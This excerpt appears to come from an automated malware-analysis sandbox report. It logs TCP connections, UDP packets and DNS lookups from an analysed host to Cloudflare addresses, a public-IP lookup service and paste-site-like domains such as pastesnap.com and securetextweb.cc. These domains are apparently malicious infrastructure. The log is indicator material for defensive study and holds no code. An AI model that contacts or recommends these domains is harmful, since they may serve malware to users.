                                                              Jan 12, 2025 09:27:56.963593960 CET50589443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.963627100 CET50589443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.963668108 CET44350589104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:56.963715076 CET50589443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.964608908 CET8050588104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:56.964663029 CET5058880192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.965092897 CET5059080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.965133905 CET5058880192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.969999075 CET8050590104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:56.970050097 CET8050588104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:56.970114946 CET5059080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.970424891 CET5059080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:56.975215912 CET8050590104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:57.421802044 CET8050588104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:57.421912909 CET5058880192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:57.422194004 CET8050588104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:57.422243118 CET5058880192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:57.426757097 CET8050588104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:57.432512045 CET8050590104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:57.432605028 CET5059080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:57.432635069 CET8050590104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:57.432679892 CET5059080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:57.437438011 CET8050590104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:15.954606056 CET50595443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:15.954663992 CET44350595104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:15.954746962 CET50595443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:17.736654997 CET50596443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:17.736716032 CET44350596104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:17.736826897 CET50596443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:17.738240004 CET50596443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:17.738255024 CET44350596104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:18.198559046 CET44350596104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:18.198699951 CET50596443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:24.398902893 CET50596443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:24.399028063 CET44350596104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:24.399288893 CET44350596104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:24.399394989 CET50596443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:24.399394989 CET50596443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:24.399574041 CET50598443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.399621964 CET44350598188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.399852037 CET50598443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.399852037 CET50598443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.399935007 CET44350598188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.399993896 CET50598443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.400214911 CET5059980192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.400629044 CET50595443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:24.400650978 CET44350595104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:24.405117035 CET8050599188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.407871962 CET5059980192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.407896042 CET5059980192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.412688971 CET8050599188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.928720951 CET44350595104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:24.928970098 CET50595443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:24.931675911 CET8050599188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.931796074 CET5059980192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.932307005 CET50600443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:24.932378054 CET44350600172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:24.932466030 CET50600443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:24.932507038 CET8050599188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.932540894 CET50600443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:24.932564974 CET5059980192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.932693005 CET5060180192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:24.932719946 CET44350600172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:24.935857058 CET50600443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:24.936732054 CET8050599188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.937508106 CET8050601172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:24.937580109 CET5060180192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:24.937604904 CET5060180192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:24.942460060 CET8050601172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:24.955724001 CET50595443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:24.955815077 CET44350595104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:24.956059933 CET44350595104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:24.956111908 CET50595443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:24.956131935 CET50595443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:24.956216097 CET50602443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.956271887 CET44350602188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.956341982 CET50602443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.956532955 CET50602443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.956561089 CET44350602188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.956614017 CET50602443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.956837893 CET5060380192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.961608887 CET8050603188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:24.961684942 CET5060380192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.961721897 CET5060380192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:24.966490030 CET8050603188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:25.419701099 CET8050601172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.419900894 CET5060180192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.419909954 CET8050601172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.420037985 CET5060180192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.421255112 CET50604443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.421351910 CET44350604172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.421502113 CET50604443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.421503067 CET50604443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.421878099 CET44350604172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.421974897 CET50604443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.423352003 CET5060580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.424736977 CET8050601172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.428142071 CET8050605172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.428232908 CET5060580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.428232908 CET5060580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.432971954 CET8050605172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.443326950 CET8050603188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:25.443428993 CET5060380192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:25.443896055 CET8050603188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:25.443969011 CET5060380192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:25.444525957 CET50606443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.444561005 CET44350606172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.444655895 CET50606443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.444770098 CET50606443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.444807053 CET44350606172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.444883108 CET50606443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.445579052 CET5060780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.448159933 CET8050603188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:25.450335979 CET8050607172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.450438976 CET5060780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.450524092 CET5060780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.455329895 CET8050607172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.890772104 CET8050605172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.891220093 CET8050605172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.891336918 CET5060580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.891336918 CET5060580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.891592979 CET50608443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:25.891629934 CET44350608104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:25.891700983 CET50608443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:25.891729116 CET50608443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:25.891823053 CET44350608104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:25.891875029 CET50608443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:25.892091990 CET5060980192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:25.896137953 CET8050605172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.896980047 CET8050609104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:25.897046089 CET5060980192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:25.897080898 CET5060980192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:25.901854038 CET8050609104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:25.912910938 CET8050607172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.913007021 CET5060780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.913372040 CET8050607172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.913414955 CET5060780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:25.913518906 CET50610443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.913564920 CET44350610172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.913621902 CET50610443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.913649082 CET50610443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.913685083 CET44350610172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.913727999 CET50610443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.913919926 CET5061180192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.917807102 CET8050607172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:25.918700933 CET8050611172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:25.918754101 CET5061180192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.918788910 CET5061180192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:25.923554897 CET8050611172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:26.367130995 CET8050609104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:26.367324114 CET5060980192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:26.367917061 CET8050609104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:26.369209051 CET50614443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:26.369240999 CET5060980192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:26.369273901 CET44350614104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:26.369364023 CET50614443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:26.369751930 CET50614443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:26.369766951 CET44350614104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:26.372147083 CET8050609104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:26.372582912 CET8050611172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:26.372680902 CET5061180192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:26.372838020 CET8050611172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:26.372885942 CET5061180192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:26.373241901 CET50615443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:26.373269081 CET44350615104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:26.373609066 CET50615443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:26.373609066 CET50615443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:26.373615980 CET5061680192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:26.373703957 CET44350615104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:26.373754978 CET50615443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:26.377526999 CET8050611172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:26.378407955 CET8050616104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:26.378490925 CET5061680192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:26.378570080 CET5061680192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:26.383344889 CET8050616104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:26.824588060 CET44350614104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:26.824676991 CET50614443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:26.825706959 CET50614443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:26.825748920 CET44350614104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:26.825877905 CET44350614104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:26.825881004 CET50614443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:26.825922966 CET50614443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:26.826273918 CET50617443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:26.826302052 CET44350617188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:26.826351881 CET50617443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:26.826381922 CET50617443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:26.826522112 CET44350617188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:26.826575994 CET50617443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:26.826853037 CET5061880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:26.831707954 CET8050618188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:26.831808090 CET5061880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:26.831875086 CET5061880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:26.836683989 CET8050618188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:26.857649088 CET8050616104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:26.857743025 CET5061680192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:26.857952118 CET8050616104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:26.858004093 CET5061680192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:26.859235048 CET50621443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:26.859266996 CET44350621104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:26.859337091 CET50621443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:26.859689951 CET50621443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:26.859702110 CET44350621104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:26.862546921 CET8050616104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:27.304043055 CET8050618188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:27.304193974 CET5061880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:27.304279089 CET8050618188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:27.304332972 CET5061880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:27.304816008 CET50622443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:27.304878950 CET44350622172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:27.305191040 CET50622443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:27.305223942 CET50622443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:27.305330992 CET44350622172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:27.305490017 CET5062380192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:27.305512905 CET50622443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:27.309056997 CET8050618188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:27.310314894 CET8050623172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:27.310818911 CET5062380192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:27.310852051 CET5062380192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:27.315613985 CET8050623172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:27.335762978 CET44350621104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:27.335846901 CET50621443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:27.336905003 CET50621443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:27.336934090 CET44350621104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:27.337069988 CET44350621104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:28:27.337125063 CET50621443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:27.337140083 CET50621443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:28:27.337513924 CET50624443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:27.337564945 CET44350624188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:27.337629080 CET50624443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:27.337660074 CET50624443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:27.337692976 CET44350624188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:27.337739944 CET50624443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:27.338104963 CET5062580192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:27.342952013 CET8050625188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:27.343024969 CET5062580192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:27.343059063 CET5062580192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:27.347820044 CET8050625188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:27.800184011 CET8050623172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:27.800290108 CET5062380192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:27.801151991 CET50627443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:27.801184893 CET8050623172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:27.801199913 CET44350627172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:27.801238060 CET5062380192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:27.801286936 CET50627443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:27.801316023 CET50627443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:27.801439047 CET44350627172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:27.801495075 CET50627443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:27.801785946 CET5062880192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:27.805057049 CET8050623172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:27.806660891 CET8050628172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:27.806755066 CET5062880192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:27.806809902 CET5062880192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:27.811599016 CET8050628172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:27.814711094 CET8050625188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:27.814821005 CET5062580192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:27.815146923 CET8050625188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:27.815206051 CET5062580192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:28:27.815468073 CET50629443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:27.815488100 CET44350629172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:27.815574884 CET50629443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:27.815607071 CET50629443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:27.815643072 CET44350629172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:27.815685987 CET50629443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:27.816021919 CET5063080192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:27.819659948 CET8050625188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:28:27.820864916 CET8050630172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:27.820950985 CET5063080192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:27.821012974 CET5063080192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:27.825845003 CET8050630172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:28.258341074 CET8050628172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:28.258677959 CET5062880192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:28.259351015 CET8050628172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:28.259380102 CET50631443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:28.259418011 CET5062880192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:28.259453058 CET44350631104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:28.259529114 CET50631443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:28.259602070 CET50631443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:28.259687901 CET44350631104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:28.259855986 CET50631443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:28.260164022 CET5063280192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:28.263550997 CET8050628172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:28.264983892 CET8050632104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:28.265057087 CET5063280192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:28.265098095 CET5063280192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:28.269890070 CET8050632104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:28.288055897 CET8050630172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:28.288218021 CET5063080192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:28.288250923 CET8050630172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:28.288331985 CET5063080192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:28:28.288813114 CET50633443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:28.288852930 CET44350633172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:28.288921118 CET50633443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:28.288947105 CET50633443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:28.289035082 CET44350633172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:28.289222002 CET5063480192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:28.289248943 CET50633443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:28.293029070 CET8050630172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:28:28.294013977 CET8050634172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:28.294078112 CET5063480192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:28.294138908 CET5063480192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:28:28.298882961 CET8050634172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:28.746675968 CET8050632104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:28.746963978 CET8050632104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:28:28.747163057 CET5063280192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:28:28.765861988 CET8050634172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:28.766510010 CET8050634172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:28:28.766575098 CET5063480192.168.2.7172.67.176.186

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Jan 12, 2025 09:26:19.258945942 CET6069453192.168.2.71.1.1.1
                                                              Jan 12, 2025 09:26:19.265641928 CET53606941.1.1.1192.168.2.7
                                                              Jan 12, 2025 09:26:19.278812885 CET5412153192.168.2.71.1.1.1
                                                              Jan 12, 2025 09:26:19.292085886 CET53541211.1.1.1192.168.2.7
                                                              Jan 12, 2025 09:26:19.337776899 CET6305253192.168.2.71.1.1.1
                                                              Jan 12, 2025 09:26:19.351217031 CET53630521.1.1.1192.168.2.7
                                                              Jan 12, 2025 09:26:42.051440001 CET5897553192.168.2.71.1.1.1
                                                              Jan 12, 2025 09:26:42.058024883 CET53589751.1.1.1192.168.2.7
                                                              Jan 12, 2025 09:26:42.818308115 CET5241753192.168.2.71.1.1.1
                                                              Jan 12, 2025 09:26:42.830581903 CET53524171.1.1.1192.168.2.7
                                                              Jan 12, 2025 09:26:43.818075895 CET6227853192.168.2.71.1.1.1
                                                              Jan 12, 2025 09:26:43.857870102 CET53622781.1.1.1192.168.2.7
                                                              Jan 12, 2025 09:26:44.342900991 CET5752853192.168.2.71.1.1.1
                                                              Jan 12, 2025 09:26:44.354959011 CET53575281.1.1.1192.168.2.7

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Jan 12, 2025 09:26:19.258945942 CET192.168.2.71.1.1.10xb320Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:19.278812885 CET192.168.2.71.1.1.10xdebStandard query (0)pastesnap.comA (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:19.337776899 CET192.168.2.71.1.1.10x313Standard query (0)pastesnap.comA (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:42.051440001 CET192.168.2.71.1.1.10x6c3bStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:42.818308115 CET192.168.2.71.1.1.10xb5a7Standard query (0)wavepassage.cfdA (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:43.818075895 CET192.168.2.71.1.1.10xcfd8Standard query (0)textbinvault.comA (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:44.342900991 CET192.168.2.71.1.1.10xa834Standard query (0)securetextweb.ccA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Jan 12, 2025 09:26:19.265641928 CET1.1.1.1192.168.2.70xb320No error (0)www.google.com142.250.181.228A (IP address)IN (0x0001)false
                                                              Jan 12, 2025 09:26:19.292085886 CET1.1.1.1192.168.2.70xdebNo error (0)pastesnap.com172.67.198.113A (IP address)IN (0x0001)false
